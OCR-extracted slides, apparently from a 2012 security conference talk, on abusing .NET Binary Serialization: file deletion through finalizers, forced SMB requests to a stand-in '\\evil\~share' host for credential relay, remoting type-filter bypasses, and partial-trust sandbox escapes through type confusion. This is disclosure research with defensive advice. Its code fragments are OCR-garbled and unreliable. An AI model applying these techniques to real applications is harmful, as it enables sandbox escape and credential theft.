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Breaking .NET sandboxes through Serialization 

James Forshaw 
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What am I going to talk about? 


• The research I did which ended up as MS 12- 
035 

• Misuse of Microsoft .NET Binary Serialization 

- Attacking badly written applications 

- Attacking .NET remoting services 

- Circumventing CAS and escaping Partial Trust 
Sandboxes 

• Not all issues have been fixed, some only 
mitigated 
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Who are we? 
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Key facts 


Core Services 


• Specialist technical 

• security consultancy 

• Approximately 100 strong 

• Offices in UK, Germany and 
Australia 


• Research 

• Assurance 

• Response 
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What is Serialization? 


"A mechanism to transform a data structure 
into a form that can be stored or transmitted 
and later recreated at another time or 
location" 

- James Forshaw - Blackhat USA 2012 
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Why Serialization? 

• Other technologies show it can be dangerous; 

- Java 

• CVE-2008-5353 - Java Calendar Serialization Vulnerability 

- COM 

• See Blackhat 2009 - Attacking Interoperability 

- PHP 

• unserialize() misuse 
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NET Serialization Support 


Technology 

.NET Version Introduced 

IFormatter Serialization (Binary 

1.0 

and SOAP) 

XML Serialization 

1.0 

Data Contracts (WCF) 

3.0 

JSON 

3.5 
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Binary Serialization 

• Cannot just serialize any object 


[Serializable] 

class SerializableClass 

{ 

public string SomeValue; 

} 
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Binary Serialization 


Cannot just serialize any object 


[s ] 

class SerializableClass 

{ 

public string SomeValue; 

} 
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Binary Serialization 

• Cannot just serialize any object 


[Serializable] ^ nust be specified 

class SerializableClass 

{ 

public string SomeValue; 

} 
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What does it look like? 


public static byte[] Serialize( o) 

{ 

BinaryFormatter fmt = new BinaryFormatterQ; 
MemoryStream stm = new MemoryStream(); 

fmt.Serialize(stm, o); 
return stm.ToArray(); 

} 
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What does it look like? 


El 


SerializableClass c = new SerializableClass(); 
c.SomeValue = "Hello World!"; 

byte[] data = Serialize(c) ; 
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What does it look like? 


a 


SerializableClass c = new SerializableClass(); 
c.SomeValue = "Hello World!"; 

byte[] data = Serialize(c) ; 
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What does it look like? 


El 


SerializableClass c = new SerializableClass(); 
c.SomeValue = "Hello World!"; 

byte[] data = Serialize(c) ; 
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What does it look like? 


SerializableClass c = new SerializableClass(); 
c.SomeValue = "Hello World!"; 

byte[] data = Serialize(c) ; 
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What does it look like? 


a 


SerializableClass c = new SerializableClass(); 
c.SomeValue = "Hello World!"; 

byte[] data = Serialize(c) ; 
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Badly Written Applications 


• With great power comes great responsibility. 

• Would the use of the BinaryFormatter in an 
untrusted scenario be an issue? 

• Surely only if you do something to cause a 
problem? 
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Implicit Functionality 

• What if the very act of deserialization is itself 
malicious? 


public static Deserialize(byte[ ] data) 

{ 

3inaryFormatter fmt = new BinaryFormatterQ; 
3am stm = new MemoryStream(data) ; 

return fmt.Deserialize(stm) as ; 

} 
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Implicit Functionality 

• What if the very act of deserialization is itself 
malicious? 


public static Deserialize(byte[ ] data) 

{ 

3inaryFormatter fmt = new BinaryFormatterQ; 
3am stm = new MemoryStream(data) ; 


} 


return fmt.Deserialize(stm) as ; 



You might be 
too late! 
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ISerializable Interface 


[Serializablt ] 

class CustomSerializableClass : ISerializable 

{ 

public string SomeValue; 

public void GetObjectData(SerializationInfo info, 

StreamingContext context) 

{ 

info.AddValue( "SomeValue" , SomeValue); 

} 

II ... 

} 


Research. Response. Assurance 


El 


lt6Xt 

INFORMATION SECURITY 



ISerializable Interface 


[Serializablt ] 

class CustomSerializableClass : ISerializable 

{ 

public string SomeValue; 

public void GetObjectData(SerializationInfo info, 

StreamingContext context) 

{ 

info.AddValue( "SomeValue" , SomeValue); 

}/ ^ 

y ’ ’’ Store value in 

Dictionary 
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ISerializable Deserializing 


[ Serializabli ] 

class CustomSerializableClass : ISerializable 

{ 

public string SomeValue; 

// ... 

protected CustomSerializableClass(SerializationInfo info, 

StreamingContext context) 

{ 

SomeValue = info.GetString("SomeValue ") ; 

} 
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ISerializable Deserializing 


[ Serializabli ] 

class CustomSerializableClass : ISerializable 

{ 

public string SomeValue; 

// ... 

protected CustomSerializableClass(SerializationInfo info, 

StreamingContext context) 

{ 

SomeValue = info.GetString( "SomeValue" ); 



Restore value 
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Types of Interest .NET 4 


Library 

Serializable 

ISerializable 

Callbacks 

Finalizable 

mscorlib 

681 

268 

56 
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System 

312 

144 

13 

3 

System.Data 

103 

66 

1 

2 

System.Xml 

33 

30 
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0 

Management 

68 

68 

0 
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Just Being Malicious 


[Serializable] 

public class TempFileCollection 

{ 

private files; 

// Other stuff... 

~TempFileCollection() 

{ 

foreach (string file in files.Keys) 

{ 

.Delete(file); 

} 

} 

} 
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Just Being Malicious 


[Serializable] 

public class TempFileCollection 

{ 

private files; Deserialized list of files 

// Other stuff... 

~TempFileCollection() 

{ 

foreach (string file in files.Keys) 

{ 

.Delete(file); 

} 

} 

} 
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Just Being Malicious 


[Serializable] 

public class TempFileCollection 

{ 

private files; Deserialized list of files 

// Other stuff... 

~TempFileCollection() 

{ 

foreach (string file in files.Keys) 

Makes sure to delete 
them when object 
destroyed! 

} 


. Delete(file); | 
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Demonstration 


• Demo of malicious serialized object, 
deleting arbitrary files 

• Using a "badly" written application which 
deserializes untrusted input 

• Windows 7 
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How to protect against this? 


• Use of SerializationBinder to limit types 
deserialized 

• Do not trust external data with 
BinaryFormatter 

• Use something else (e.g. XMLSerializer, Data 
Contracts, Protobuf.NET) 
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I Am Feeling Safer Already! 


• So you are not using BinaryFormatter in your 
code, you are safe, right? 

• Well maybe, are you using: 

- .NET Remoting? 

- Partial Trust Sandboxes? 

• If yes then you could still be vulnerable 
without knowing it 
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.NET Remoting Architecture 

AppDomain Boundary 


AppDomain 


AppDomain 
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.NET Remoting Architecture 

AppDomain Boundary 


AppDomain 



AppDomain 
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.NET Remoting Architecture 

AppDomain Boundary 


RemObject.DoWork(a) 


AppDomain 



AppDomain 
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.NET Remoting Architecture 


AppDomain Boundary 



AppDomain TCP Channel AppDomain 
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.NET Remoting Architecture 

AppDomain Boundary 


AppDomain TCP Channel AppDomain 
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.NET Remoting Architecture 

AppDomain Boundary 


RemObject.DoWork(a) 


AppDomain TCP Channel 



Appuomain 
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.NET Remoting Architecture 


AppDomain Boundary 


RemObject.DoWork(a) 


AppDomain TCP Channel 



AppDomain 
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Marshal By Reference 

AppDomain Boundary 





Well Known 

Service 

AppDomain 

TCP Channel 

AppDomain 

I Marshal By 1 

§ Reference | 

! Object 
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Marshal By Reference 

AppDomain Boundary 


| RemObject.DoWork(a) J 



Transparent 1 'N 

Pro,,v , n 




WJ 

AppDomain 

TCP Channel 

AppDomain 

ObjRef | 

f Marshal \ :| 

1 Reference 

. 
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Marshal By Reference 


AppDomain Boundary 
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Marshal By Value 

AppDomain Boundary 





Well Known 

Service 

AppDomain 

TCP Channel 

AppDomain 

| Serializable | 

I Object I 
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Marshal By Value 

AppDomain Boundary 


RemObject.DoWork(a) 


AppDomain TCP Channel AppDomain 
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Marshal By Value 

AppDomain Boundary 
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More Active Attacks 


[ ] 

public class Filelnfo 

{ 

private string FullPath; 


> 


protected FileInfo( 
{ 


infOj 

context) 


FullPath = NormalizePath(info.GetString("FullPath")); 


} 
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More Active Attacks 


[ ] 

public class Filelnfo 

{ 

private string FullPath; 


> 


protected FileInfo( 
{ 


infOj 

context) 


FullPath = NormalizePath(info.GetString("FullPath")); 



Ensures path is canonical 
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Path Normalization 


string NormalizePath(string path) 

{ 

string[] parts = path.Split( '\\' ); 

foreach(string part in parts) 

{ 

currPath += "\\" + part; 
if(part[0] == '-') 

{ 

GetLongPathName(currPath); 

> 

> 
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Path Normalization 



string NormalizePath(string path) 

{ 

string[] parts = path.Split( '\\' ); 

foreach(string part in parts) 

{ 

currPath += "\\" + part; 
if(part[0] == '~') 

{ 


GetLongPathName(currPath); 


> 


> 



> 


If potential short path 
call Windows API 
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Exploiting Filelnfo 


• Pass in a filename of the form: 

- \\evil\~share 

• Application will make an SMB request during 
deserialization 

• SMB Reflection/Relay anyone? 


El 


INFORMATION SECURITY 


Research. Response. Assurance 



They Saw Us Coming 


Home ^Library Learn Downloads Support Sign in | United States - English | O | e 


Automatic Deserialization in .NET Framework msdn 

Remoting 

.NET Framework 4 | Other Versions ▼ | This topic has not yet been rated - Rate this topic 

This topic is specific to a legacy technology that is retained for backward compatibility with existing 
applications and is not recommended for new development. Distributed applications should now be 
developed using the Windows Communication Foundation (WCF). 

Remoting systems that rely on run-time type validation must deserialize a remote stream to begin using it and an 
unauthorized client might try to exploit the moment of deserialization. To help protect against this type of attack, 
.NET Framework remoting provides two levels of automatic deserialization. Low and Full. Low the default value, 
protects against deserialization attacks by deserializing only the types associated with the most basic remoting 
functionality, such as automatic deserialization of remoting infrastructure types, a limited set of system- 
implemented types, and a basic set of custom types. The Full deserialization level supports automatic 
deserialization of all types that remoting supports in all situations. 
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They Saw Us Coming 


Home ^Library Learn Downloads Support Sign in | United States - English | ^ | e 
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TypeFiltering 


Attacker 





TCP Channel Remote Server 




conxexi 
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TypeFiltering 


Attacker 


TCP Channel 


Remote Server 
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TypeFiltering 
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Bypassing TypeFiltering 


Attacker 

TCP Channel 

Remote Server 

★ 

DataSet 
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Bypassing TypeFiltering 


Attacker 



TCP Channel 



Remote Server 
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Bypassing TypeFiltering 


Attacker 



TCP Channel 



Remote Server 
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Bypassing TypeFiltering 


El 
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Demonstration 


• Demo of malicious serialized object with 
SMB reflection 

• This demo only works on OSes prior to MS08- 
068 (using XP SP2) 

• The actual issue however isn't fixed 

• Can still be used for information gathering or 
credential relay on an up to date OS 
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How to protect against this? 


• Windows Communication Foundation (WCF) 
is recommended for new applications 

- Don't expose to the Internet 

- Enable Authentication 

• However, “What works up, probably works 
down” 

• Impersonate server and attack clients 
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Partial Trust Sandboxes 
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Partial Trust Sandboxes 


Host AppDomain 



Channel 
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Partial Trust Sandboxes 


Host AppDomain 

Channel 

PT AppDomain 

1 Host Class 
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Partial Trust Sandboxes 
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Partial Trust Sandboxes 
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Partial Trust Sandboxes 


El 
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Code Access Security 


• Some God like privileges: 

- Unmanaged Code Access 

- Control AppDomain 

- Skip IL Verification 

- Access to Serialization Services! 

• Will not have Serialization permission 

• Find an AppDomain transition! 
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a 

Easier Than You Would Think! 


ex = new (); 

ex.Data.AddC'ExploitMe", new ()); 

throw ex; 


/T 
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Easier Than You Would Think! 

• In XBAP the following code passes objects 
across the boundary: 


ex = new E (); <P Exception class is serializable 

ex.Data.Add("ExploitMe ,, . > new ()); 

throw ex; 


• Fixed as CVE-2012-0161 
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Easier Than You Would Think! 


In XBAP the following code passes objects 
across the boundary: 


Add our object to 
ex = new (); exception "Data" 

dictionary 

ex.Data.AddC'ExploitMe", new ()); 

throw ex; 


Fixed as CVE-2012-0161 
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Easier Than You Would Think! 

• In XBAP the following code passes objects 
across the boundary: 


ex = new (); 

ex.Data.AddC'ExploitMe" j new ()); 

throw ex; <=< Cross boundary causing serialization then deserialization 


• Fixed as CVE-2012-0161 
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We Still Have a Problem 


• Need privileged access to create or 
manipulate vulnerable classes. 

• Cannot directly provide binary stream 

• How can partial trust code possibly 
manipulate the serialization process? 
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ISerializable Redux 


[ ] 

class : 

{ 

public void GetObjectData( info, 

context) 

{ 

// Change our type to something else! 
info.SetType(typeof ( )); 

info.AddValue( "OriginalPath" , @ ,, \\server\~share" ); 

> 

> 
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ISerializable Redux 


[ ] 

class : 

{ 

public void GetObjectData( info, 

context) 

{ 

// Change our type to something else! Deserialize as an 
info.SetType(typeof ( )); =1 unrelated type 

info.AddValue("OriginalPath" J @"\\server\~share"); 

} 

} 
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ISerializable Redux 


[ ] 

class 


public void GetObjectData( info, 

context) 

{ 

// Change our type to something else! Deserialize as an 
info.SetType(typeof ( )); =1 unre | at ed type 


info.AddValue( "OriginalPath" , @ ,, \\server\~share" ); 


Fake serialization data 
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Type Conversion 


AppDomain Boundary 






Host AppDomain Channel PT AppDomain 


a 
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Type Conversion 

AppDomain Boundary 


Host AppDomain 


Channel 


PT AppDomain 


00 01 00 00 00 
00 OC 02 00 00 
74 61 2C 20 56 
30 2E 30 2C 20 
74 72 61 6C 2C 
6F 6B 65 6E 3D 
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Type Conversion 


AppDomain Boundary 






Host AppDomain Channel PT AppDomain 


a 




Round Trip Serialize Exception Data 
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But So What? 


• What can we actually use this for? 

• Could probably do SMB reflection etc. 
again but we have code running on the 
machine, we must be able to do better? 

• What if we could get back the object we 
deserialized? 
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Attack of the Clones 


• EvidenceBase Class added to .NET 4 

• Marked as serializable 

• Implements a Clone method 

- Common programming technique to copy 
object state 
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WW! ■ * "V W 

INFORMATION SECURITY 



EvidenceBase.Clone 


[SecurityPermission(SecurityAction.Assertj 
SerializationFormatter = true)] 

public virtual Clone() 

{ 

using ( stream = new ()) 

{ 

formatter = new BinaryFormatterQ; 
formatter.Serialize(streamj this); 
stream.Position = 0L; 

return formatter.Deserialize(stream) as ; 

> 


51CC 
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EvidenceBase.Clone 


[SecurityPermission(SecurityAction.Assertj Oh Dear! 

SerializationFormatter = true)] 

public virtual Clone() 

{ 

using ( stream = new ()) 

{ 

formatter = new BinaryFormatterQ; 
formatter.Serialize(streamj this); 
stream.Position = 0L; 

return formatter.Deserialize(stream) as ; 

} 
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Exploiting It! 
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Delegates 


• A fundamental type in the .NET runtime 

- Gets special treatment for reasons of 
performance 

• Effectively a fancy function pointer 

• Crucially it is serializable 
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Delegate Multicasting 


delegate void MyDc tr(Ir p); 

public static void DoSomethingPtr( p) 

{ 

.lAlriteLine(p); 

} 

public RunDelegateQ 

{ 

d = Delegate.Combine( 
new (DoSomethingPtr)j 

new (DoSomethingPtr)); 

d(new (0x12345678)); 

> 
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Delegate Multicasting 


delegate void MyD< tr(Ir p) I Type of delegate 

public static void DoSomethingPtr( p) 

{ 

.l/\lritel_ine(p); 

} 

public RunDelegate() 

{ 

d = Delegate.Combine( Combine two 

new (DoSomethingPtr), delegates together 

new (DoSomethingPtr)); 

d(new (0x12345678)); 

} 



:or 
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delegate void ( p); Type of delegate 

public static void DoSomethingPtr( p) 

{ 

.l/\lritel_ine(p); 

} 

public RunDelegateQ 

{ 

d = Delegate.Combine( Combine two 

new (DoSomethingPtr), delegates together 

new (DoSomethingPtr)); 


} 


d(new (0x12345678)); 


Calls DoSomethingPtr twice 
with the same parameter 








delegate void ( p); Type of delegate 

public static void DoSomethingPtr( p) 

{ 

.l/\lritel_ine(p); 

} 

public RunDelegateQ 

{ 

d = Delegate.Combine( Combine two 

new (DoSomethingPtr), delegates together 

new (DoSomethingPtr)); 


} 


d(new (0x12345678)); 


Calls DoSomethingPtr twice 
with the same parameter 







Delegate Multicasting 


delegate void MyDe tr(St ing s); 

public static void DoSomet 
hingStr( s) { } 

public RunDelegate() 

{ 

d = Delegate.Combine( 
new (DoSomethingPtr), 

new (DoSomethingStr)); 

d(new (0x12345678)); 

} 
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Delegate Multicasting 


delegate void ( s); 

public static void DoSomet 
hingStr( s) { } 

public RunDelegate() 

{ 

d = Delegate.Combine( Combination fails 

new (DoSomethingPtr), with an Exception 

new (DoSomethingStr)); 

d(new (0x12345678)); 

} 
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Serialized Delegate 


public RunDelegate() 

{ 

// Get a delegate combining IntPtr and String types 
d = GetSerializedDelegate(); 

d(new (0x12345678)); 

} 
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Serialized Delegate 


public RunDelegate() 

{ 

// Get a delegate combining IntPtr and String types 
d = GetSerializedDelegate(); 

d(new (0x12345678)); Now what will 

\ this do? 
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Type Confusion 


eax=000d3888 ebx=0035b798 ecx=12345678 
edx=12345678 esi=0024eae4 edi=00000001 
eip=002f09fb esp=0024eaac ebp=0024eab4 iopl=0 
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b 

002f09fb 8b01 mov eax,dword ptr [ecx] ds:002b:12345678=???????? 

002f09fd 8b4028 mov eax,dword ptr [eax+28h] 

002f0a00 fflO call dword ptr [eax] 

0:000> Iclrstack 
OS Thread Id: 0xl2a0 (0) 

Child SP IP Call Site 

0024eaac 002f09fb Demo.DoSomethingStr(System.String) 

0024eae4 000ca2be Demo+MyDelegatePtr.Invoke(IntPtr) 

0024eaf4 002f054b Demo.DoTypeConfusion() 
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Type Confusion 


eax=000d3888 ebx=0035b798 ecx=12345678 
edx=12345678 esi=0024eae4 edi=00000001 


ECX Points to Fake Value 


eip=002f09fb esp=0024eaac 
cs=0023 ss=002b ds=002b 


ebp=0024eab4 iopl=0 
es=002b fs=0053 gs=002b 


002f09fb 8b01 mov eax,dword ptr [ecx] ds:002b:12345678=???????? 

002f09fd 8b4028 mov eax,dword ptr [eax+28h] 

002f0a00 fflO call dword ptr [eax] 


0:000> Iclrstack 
OS Thread Id: 0xl2a0 (0) 

Child SP IP Call Site 

0024eaac 002f09fb Demo.DoSomethingStr(System.String) 
0024eae4 000ca2be Demo+MyDelegatePtr.Invoke(IntPtr) 
0024eaf4 002f054b Demo.DoTypeConfusion() 
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Type Confusion 


eax=000d3888 ebx=0035b798 ecx=12345678 


ECX Points to Fake Value 


edx=12345678 esi=0024eae4 edi=00000001 
eip=002f09fb esp=0024eaac ebp=0024eab4 iopl=0 
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b 



002f09fb 8b01 mov eax,dword ptr [ecx] ds:002b:12345678=???????? 
002f09fd 8b4028 mov eax,dword ptr [eax+28h] Results in 3 

002f0a00 fflO call dword ptr [eax] ^ VTable look 


0 : 000> ! clrstack Up and call 

OS Thread Id: 0xl2a0 (0) 

Child SP IP Call Site 

0024eaac 002f09fb Demo.DoSomethingStr(System.String) 

0024eae4 000ca2be Demo+MyDelegatePtr.Invoke(IntPtr) 

0024eaf4 002f054b Demo.DoTypeConfusion() 
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Type Confusion 


eax=000d3888 ebx=0035b798 ecx=12345678 
edx=12345678 esi=0024eae4 edi=00000001 
eip=002f09fb esp=0024eaac ebp=0024eab4 iopl=0 
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b 


ECX Points to Fake Value 


002f09fb 8b01 
002f09fd 8b4028 
002fOaOO fflO 


eax,dword ptr [ecx] ds:002b:12345678=? 


eax,dword ptr [eax+28h] 
dword ptr [eax] Z 1 


0:000> Iclrstack 
OS Thread Id: 0xl2a0 (0) 

Child SP IP Call Site 

0024eaac 002f09fb Demo.DoSomethingStr(System.String) 
0024eae4 000ca2be Demo+MyDelegatePtr.Invoke(IntPtr) 
0024eaf4 002f054b Demo.DoTypeConfusion() 


Results in a 
VTable look 
up and call 


Clearly 

Confused 
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Demonstration 


• Quick demo in a Click Once Application 

• Fixed in CVE-2012-0160 

• Windows 7 
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Reflection Attack 


• EvidenceBase isn't exactly subtle 

- Clearly a bug and should be fixed 

• What if we could do the same but: 

- Without any specific bug 

- Works in any version of .NET 

- Also be difficult to fix © 
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Hashtable Serialization 


a 


public class Hashtable 

{ 

object [] keys; 
object [] values; 

buckets; 

protected Hashtable( info, 

context) 

{ 

keys = (object[])info.GetValue("keys"); 
values = (object[] )info.GetValue( "values" ); 
buckets = RebuildHashTable(keySj values); 

} 

} 


i conxexi 
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Hashtable Serialization 


public class Hashtable 

{ 

object [] keys; 
object [] values; 

buckets; 

protected Hashtable( info, 

context) 

{ 

keys = (object[])info.GetValue("keys"); Deserialize Keys 

values = (object[] )info.GetValue( "values" ); and Values 
buckets = RebuildHashTable(keySj values); 

} 

} 
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Hashtable Serialization 


public class Hashtable 

{ 

object [] keys; 
object [] values; 

buckets; 

protected Hashtable( info, 

context) 

{ 

keys = (object[])info.GetValue("keys"); Deserialize Keys 

values = (object[] )info.GetValue( "values" ); and Values 
buckets = RebuildHashTable(keySj values); 

, ^ Rebuild Hash Table 
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Hashtable Serialization 


comparer; 

private RebuildHashtable(object [] keys, 

object[] values) 

{ 

ret = new uckc (); 

for (int i = 0; i < keys.Length; ++i) 

{ 

ret.Add(comparer.GetHashCode(keys[i]), values[i]); 

} 

return ret; 

} 
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Hashtable Serialization 


comparer; <^_ _J Serialized with Hashtable 

private RebuildHashtable(object [] keys, 

object[] values) 

{ 

ret = new ucke (); 

for (int i = 0; i < keys.Length; ++i) 

{ 

ret.Add(comparer.GetHashCode(keys[i]), values[i]); 

} 

return ret; 
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Hashtable Serialization 


comparer; <^_ _J Serialized with Hashtable 

private RebuildHashtable(object [] keys, 

object[] values) 

{ 

ret = new ucke (); 

for (int i = 0; i < keys.Length; ++i) 

{ 

ret.Add(comparer.GetHashCode(keys[i])j values[i]); 

} 

return ret; 

^ Calls method passing back keys 
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Hashtable Serialization 


comparer; <^_ _J Serialized with Hashtable 


private RebuildHashtable(object [] keys, 

object[] values) 

{ 

ret = new ucke (); 

for (int i = 0; i < keys.Length; ++i) 

{ 

ret.Add(comparer.GetHashCode(keys[i])j values[i]); 


} 

return ret; 



What if this wasn't serialized? 


Calls method passing back keys 
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Hashtable Exploit 


AppDomain Boundary 





•1 

Host AppDomain Channel PT AppDomain 


Q 
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Hashtable Exploit 


AppDomain Boundary 


Host AppDomain Channel 


r 1 

MyEquality 

Comparer 

L A 


PT AppDomain 


00 01 00 00 00 
00 OC 02 00 00 
74 61 2C 20 56 
30 2E 30 2C 20 
74 72 61 6C 2C 
6F 6B 65 6E 3D 
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Hashtable Exploit 

AppDomain Boundary 



Host AppDomain Channel PT AppDomain 



Round Trip Serialize Keys, pass 
Research. Response. Assurance reference to Comparer 
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Hashtable Exploit 

AppDomain Boundary 

Call GetHashCode 



passing 

back each 

Cey 

★ 

MyEquality 

Comparer i 

Host AppDomain 

Channel 1 

PT AppDomain 

★ 

Hashtable 



O 

Hashtable 






Round Trip Serialize Keys, pass 
Research. Response. Assurance reference to Comparer 
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Demonstration 


• Quick demo in an XBAP 

• Worked until May 2012 on any supported 
platform 

• Route to attack vector closed but 
underlying vulnerability still exists 
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How to protect against this? 


• Tricky! 

• Technically only using normal functions 

• Potential for back-compat issues 

• Microsoft's fix was to block type aliasing via 
Serializationlnfo.$etType() 

• And block XBAP for ever more © 
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Review 


• More than just the 2 fixes in MS 12-035 
- Numerous issues across the framework 

• Attacks from Partial Trust mitigated 

• .NET Remoting isn't fixed, you should be 
using WCF instead! 

• Number of objects which still might do 
“bad” things 
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Questions? 


• More info in Whitepaper 
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